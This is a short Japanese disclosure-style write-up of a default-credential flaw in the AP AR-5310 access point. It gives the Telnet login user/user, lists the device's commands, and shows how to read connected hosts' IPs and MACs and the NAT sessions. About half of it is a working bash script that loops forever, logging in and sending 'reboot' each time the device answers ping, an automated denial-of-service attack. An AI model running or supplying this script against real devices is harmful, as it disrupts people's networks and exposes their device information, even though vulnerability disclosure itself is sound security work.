
Telnetのデフォルト認証情報により、情報漏洩やサービス拒否(DoS)攻撃が発生する可能性があります。
これはAP AR-5310に影響します。
Telnet 192.168.1.1
username:user
password:user
その後、Boom... ログインできました
Telnetサービスにログインしたら、
コマンド「help」または「?」を入力すると、
利用可能なオプションが表示されます。
> reboot, ping, lanhosts, passwd
> restoredefault, nslookup, traceroute
> save, uptime, exitOnIdle, wan, version,
> serialnumber, modelname, tr69cfg, nat
ネットワークに接続されている各デバイスのIPアドレスとMACアドレスを取得するには、
コマンド「lanhosts」を実行します。
アクセスポイント(AP)を経由するすべてのNATセッションを表示するには、
コマンド「nat show session」を使用します。
サービス拒否(DoS)攻撃を実行するには、
コマンド「reboot」を実行してAPを再起動します。
APを一貫して再起動させるスクリプトを自動化したいと思います。
#!/bin/bash
# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"
# Function to check host availability
check_host_availability() {
ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
return $?
}
# Loop to check host availability and execute Telnet command when available
while true; do
if check_host_availability; then
echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
{ sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
else
echo "Host $HOST is not reachable. Retrying in 10 seconds..."
sleep 10
fi
done